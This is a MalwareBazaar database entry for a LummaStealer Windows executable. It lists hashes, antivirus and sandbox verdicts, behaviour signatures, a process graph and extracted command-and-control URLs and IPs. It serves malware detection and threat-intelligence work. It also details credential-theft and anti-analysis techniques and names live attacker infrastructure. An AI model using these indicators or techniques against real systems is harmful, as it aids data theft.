MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 cdf06ee922f209a5ea0f3a2f05acc8813e0cc98384493a54373cc246e8ad1095. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


LummaStealer


Vendor detections: 18


Intelligence 18 IOCs YARA 2 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: cdf06ee922f209a5ea0f3a2f05acc8813e0cc98384493a54373cc246e8ad1095
SHA3-384 hash: feb6fc1b4f15c35cc6216a48bd513c68e2c3f6d48a6d6d853e1580253f4970a4bdb901864ff2b256a3ca61a006ea47d2
SHA1 hash: 31c237c3d02833010e8788c653e03c8637c4927f
MD5 hash: 2ba2329d40af33806efdb0bbe5aeb0ad
humanhash: single-bacon-tennessee-freddie
File name:2ba2329d40af33806efdb0bbe5aeb0ad.exe
Download: download sample
Signature LummaStealer
Create hunting rule
File size:1'858'048 bytes
First seen:2024-12-31 08:43:25 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash 2eabe9054cad5152567f0699947a2c5b (2'852 x LummaStealer, 1'312 x Stealc, 1'026 x Healer)
ssdeep 49152:EtagWfvpLIVOXhJRTgNoGOHEjSrIGKYwPmm:EcHfyVOxJKiGOHEesGKhPmm
TLSH T14385336F2C95ACFEE7D907748CB3466EE3BD6B4242DE172C2B4738D74814202D945A8B
TrID 42.7% (.EXE) Win32 Executable (generic) (4504/4/1)
19.2% (.EXE) OS/2 Executable (generic) (2029/13)
19.0% (.EXE) Generic Win/DOS Executable (2002/3)
18.9% (.EXE) DOS Executable Generic (2000/1)
Magika pebin
Reporter abuse_ch
Tags:exe LummaStealer

Intelligence

File Origin
# of uploads :
1
# of downloads :
408
Origin country :
NL NL
Vendor Threat Intelligence
Malware family:
amadey
Create hunting rule
ID:
1
File name:
2ba2329d40af33806efdb0bbe5aeb0ad.exe
Verdict:
Malicious activity
Analysis date:
2024-12-31 08:58:43 UTC
Tags:
lumma stealer loader stealc amadey botnet themida
Link:
https://app.any.run/tasks/635dfe42-133a-4547-b38a-a0b55849ee97

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection(s):
SecuriteInfo.com.Trojan.PWS.Lumma.1113.7153.12523.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
99.9%
Link:
https://cyber-fortress.com/docs/result/index.php?id=6773aee21ada70779824c340
Tags:
vmdetect autorun
Result
Verdict:
Malware
Maliciousness:

Behaviour
Сreating synchronization primitives
Searching for analyzing tools
Searching for the window
DNS request
Connection attempt
Sending a custom TCP request
Behavior that indicates a threat
Connection attempt to an infection source
Query of malicious DNS domain
Sending a TCP request to an infection source
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Tags:
anti-vm packed packed packer_detected xpack
Link:
https://www.filescan.io/uploads/6773aedc5c29e11444edc625/reports/dc80fc16-c3a6-459e-9922-38a25f8e73e9/overview
Verdict:
Malicious
Labled as:
Jaik.Generic
Link:
https://www.hybrid-analysis.com/sample/cdf06ee922f209a5ea0f3a2f05acc8813e0cc98384493a54373cc246e8ad1095
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Verdict:
Unknown
Link:
https://analyze.intezer.com/analyses/74ac9a8a-e536-4e14-a272-e5a0aedd9aee
Result
Threat name:
LummaC, Amadey, Babadeda, LiteHTTP Bot,
Create hunting rule
Detection:
malicious
Classification:
phis.troj.spyw.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1582701
Signature
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
AI detected suspicious sample
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
C2 URLs / IPs found in malware configuration
Creates HTA files
Detected unpacking (changes PE section rights)
Drops PE files to the document folder of the user
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
PE file contains section with special chars
PE file has nameless sections
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell download and execute file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious MSHTA Child Process
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected Babadeda
Yara detected LiteHTTP Bot
Yara detected LummaC Stealer
Yara detected obfuscated html page
Yara detected Poverty Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582701 Sample: 5EfYBe3nch.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 174 Found malware configuration 2->174 176 Malicious sample detected (through community Yara rule) 2->176 178 Antivirus detection for URL or domain 2->178 180 30 other signatures 2->180 10 5EfYBe3nch.exe 2 2->10         started        15 skotes.exe 2->15         started        17 cmd.exe 2->17         started        19 3 other processes 2->19 process3 dnsIp4 158 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 10->158 160 104.21.96.1 CLOUDFLARENETUS United States 10->160 128 C:\Users\user\...\DLTDCR8UJINP8YM8Y.exe, PE32 10->128 dropped 130 C:\Users\...\31FYMQUCQX14ZVCZU2HAYNV7V.exe, PE32 10->130 dropped 246 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->246 248 Query firmware table information (likely to detect VMs) 10->248 250 Found many strings related to Crypto-Wallets (likely being stolen) 10->250 260 4 other signatures 10->260 21 DLTDCR8UJINP8YM8Y.exe 36 10->21         started        26 31FYMQUCQX14ZVCZU2HAYNV7V.exe 4 10->26         started        162 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 15->162 164 104.18.10.31 CLOUDFLARENETUS United States 15->164 166 31.41.244.11 AEROEXPRESS-ASRU Russian Federation 15->166 132 C:\Users\user\AppData\...\36ac23ea9d.exe, PE32 15->132 dropped 134 C:\Users\user\AppData\Local\...\av3EZhq.exe, PE32+ 15->134 dropped 136 C:\Users\user\AppData\Local\Temp\...\am.exe, PE32 15->136 dropped 140 12 other malicious files 15->140 dropped 252 Hides threads from debuggers 15->252 254 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->254 256 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->256 28 eXbhgU9.exe 15->28         started        30 cmd.exe 15->30         started        32 iSHmPkn.exe 15->32         started        138 C:\Temp\random.hta, HTML 17->138 dropped 258 Creates HTA files 17->258 38 2 other processes 17->38 34 cmd.exe 19->34         started        36 cmd.exe 19->36         started        40 2 other processes 19->40 file5 signatures6 process7 dnsIp8 148 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 21->148 150 127.0.0.1 unknown unknown 21->150 110 C:\Users\user\DocumentsbehaviorgraphIIIIJDHJE.exe, PE32 21->110 dropped 112 C:\Users\user\AppData\...\softokn3[1].dll, PE32 21->112 dropped 114 C:\Users\user\AppData\Local\...\random[1].exe, PE32 21->114 dropped 124 11 other files (7 malicious) 21->124 dropped 196 Detected unpacking (changes PE section rights) 21->196 198 Attempt to bypass Chrome Application-Bound Encryption 21->198 200 Drops PE files to the document folder of the user 21->200 216 7 other signatures 21->216 42 cmd.exe 1 21->42         started        45 chrome.exe 21->45         started        116 C:\Users\user\AppData\Local\...\skotes.exe, PE32 26->116 dropped 202 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 26->202 218 2 other signatures 26->218 48 skotes.exe 26->48         started        152 140.82.121.3 GITHUBUS United States 28->152 154 185.199.109.133 FASTLYUS Netherlands 28->154 118 C:\YQNZByFp\jyidkjkfhjawd.exe, PE32 28->118 dropped 204 Multi AV Scanner detection for dropped file 28->204 206 Machine Learning detection for dropped file 28->206 208 Adds a directory exclusion to Windows Defender 28->208 57 4 other processes 28->57 50 cmd.exe 30->50         started        53 conhost.exe 30->53         started        156 185.244.212.106 M247GB Romania 32->156 210 Antivirus detection for dropped file 32->210 220 2 other signatures 32->220 120 C:\Temp\8tA3oGhlP.txt, HTML 34->120 dropped 59 6 other processes 34->59 122 C:\Temp122LqFjPikt.txt, HTML 36->122 dropped 61 6 other processes 36->61 212 Suspicious powershell command line found 38->212 214 Tries to download and execute files (via powershell) 38->214 55 powershell.exe 38->55         started        file9 signatures10 process11 dnsIp12 222 Uses schtasks.exe or at.exe to add and modify task schedules 42->222 63 GIIIIJDHJE.exe 2 42->63         started        66 conhost.exe 42->66         started        168 192.168.2.4 unknown unknown 45->168 170 239.255.255.250 unknown Reserved 45->170 224 Suspicious execution chain found 45->224 68 chrome.exe 45->68         started        226 Detected unpacking (changes PE section rights) 48->226 228 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 48->228 230 Tries to evade debugger and weak emulator (self modifying code) 48->230 242 3 other signatures 48->242 106 C:\Temp\QZ7iCUD92.txt, HTML 50->106 dropped 108 C:\Temp\.gif, HTML 50->108 dropped 71 mshta.exe 50->71         started        73 5 other processes 50->73 75 2 other processes 55->75 172 172.67.179.160 CLOUDFLARENETUS United States 57->172 232 Multi AV Scanner detection for dropped file 57->232 234 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 57->234 236 Query firmware table information (likely to detect VMs) 57->236 244 5 other signatures 57->244 77 2 other processes 57->77 79 3 other processes 59->79 238 Suspicious powershell command line found 61->238 240 Tries to download and execute files (via powershell) 61->240 81 3 other processes 61->81 file13 signatures14 process15 dnsIp16 262 Detected unpacking (changes PE section rights) 63->262 264 Tries to evade debugger and weak emulator (self modifying code) 63->264 266 Hides threads from debuggers 63->266 83 skotes.exe 63->83         started        142 142.250.184.206 GOOGLEUS United States 68->142 144 142.250.185.195 GOOGLEUS United States 68->144 146 8 other IPs or domains 68->146 268 Suspicious powershell command line found 71->268 270 Tries to download and execute files (via powershell) 71->270 86 powershell.exe 71->86         started        89 powershell.exe 73->89         started        91 powershell.exe 73->91         started        272 Tries to detect sandboxes / dynamic malware analysis system (registry check) 75->272 274 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 75->274 93 483d2fa8a0d53818306efeb32d3.exe 79->93         started        95 conhost.exe 79->95         started        97 483d2fa8a0d53818306efeb32d3.exe 81->97         started        99 conhost.exe 81->99         started        signatures17 process18 file19 182 Hides threads from debuggers 83->182 184 Tries to detect sandboxes / dynamic malware analysis system (registry check) 83->184 186 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 83->186 126 C:\Users\...\483d2fa8a0d53818306efeb32d3.exe, PE32 86->126 dropped 101 483d2fa8a0d53818306efeb32d3.exe 86->101         started        104 conhost.exe 86->104         started        signatures20 process21 signatures22 188 Detected unpacking (changes PE section rights) 101->188 190 Tries to detect sandboxes and other dynamic analysis tools (window names) 101->190 192 Tries to evade debugger and weak emulator (self modifying code) 101->192 194 3 other signatures 101->194
Score:
100%
Verdict:
Malware
File Type:
PE
Link:
https://malprob.io/report/cdf06ee922f209a5ea0f3a2f05acc8813e0cc98384493a54373cc246e8ad1095
Detection:
lumma
Create hunting rule
Link:
https://mwdb.cert.pl/sample/cdf06ee922f209a5ea0f3a2f05acc8813e0cc98384493a54373cc246e8ad1095/
Threat name:
Win32.Trojan.Vigorf
Create hunting rule
Status:
Malicious
First seen:
2024-12-31 05:20:09 UTC
File Type:
PE (Exe)
Extracted files:
1
AV detection:
21 of 23 (91.30%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=zxyg52jc6ie2l2qphixqllgiqe7azsmdqretuvbxhtben2fncckq._file
Verdict:
malicious
Label(s):
lummastealer
Create hunting rule
Similar samples:
error
LummaStealer
Result
Malware family:
lumma
Create hunting rule
Score:
  10/10
Tags:
family:lumma discovery evasion stealer
Link:
https://tria.ge/reports/241231-knq53asndw/
Behaviour
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
System Location Discovery: System Language Discovery
Suspicious use of NtSetInformationThreadHideFromDebugger
Checks BIOS information in registry
Identifies Wine through registry keys
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Lumma Stealer, LummaC
Lumma family
Malware Config
C2 Extraction:
https://cloudewahsj.shop/api
https://rabidcowse.shop/api
https://noisycuttej.shop/api
https://tirepublicerj.shop/api
https://framekgirus.shop/api
https://wholersorie.shop/api
https://abruptyopsn.shop/api
https://nearycrepso.shop/api
https://fancywaxxers.shop/api
Verdict:
Suspicious
Tags:
n/a
YARA:
n/a
Link:
https://app.threat.zone/submission/b9d8d0bd-7c11-498b-ba2a-dd16f67bda05
Unpacked files
SH256 hash:
0528fdc49725245b02b133145bdaf5f3dc5b68d5b498819e3cdaac6bca14c250
MD5 hash:
77717d2e235ed02d42a99f8f807294db
SHA1 hash:
d9bcc9bb617e9a5a6f498fb4af9748f7b5034f9a
Link:
https://www.unpac.me/results/e0a39c2a-2d8a-43b3-8e2f-13c25b2b038d/
SH256 hash:
cdf06ee922f209a5ea0f3a2f05acc8813e0cc98384493a54373cc246e8ad1095
MD5 hash:
2ba2329d40af33806efdb0bbe5aeb0ad
SHA1 hash:
31c237c3d02833010e8788c653e03c8637c4927f
Link:
https://www.unpac.me/results/e0a39c2a-2d8a-43b3-8e2f-13c25b2b038d/
Malware family:
Lumma
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/cdf06ee922f2/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/cdf06ee922f209a5ea0f3a2f05acc8813e0cc98384493a54373cc246e8ad1095

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Sus_Obf_Enc_Spoof_Hide_PE
Create hunting rule
Author:XiAnzheng
Description:Check for Overlay, Obfuscating, Encrypting, Spoofing, Hiding, or Entropy Technique(can create FP)
Rule name:vmdetect
Create hunting rule
Author:nex
Description:Possibly employs anti-virtualization techniques

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

LummaStealer

Executable exe cdf06ee922f209a5ea0f3a2f05acc8813e0cc98384493a54373cc246e8ad1095

(this sample)

  
URLhaus
https://urlhaus.abuse.ch/url/3337943/
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/3245480/

BLint

The following table provides more information about this file using BLint. BLint is a Binary Linter to check the security properties, and capabilities in executables.

Findings
IDTitleSeverity
CHECK_AUTHENTICODEMissing Authenticodehigh
CHECK_DLL_CHARACTERISTICSMissing dll Security Characteristics (HIGH_ENTROPY_VA)high
CHECK_NXMissing Non-Executable Memory Protectioncritical

Comments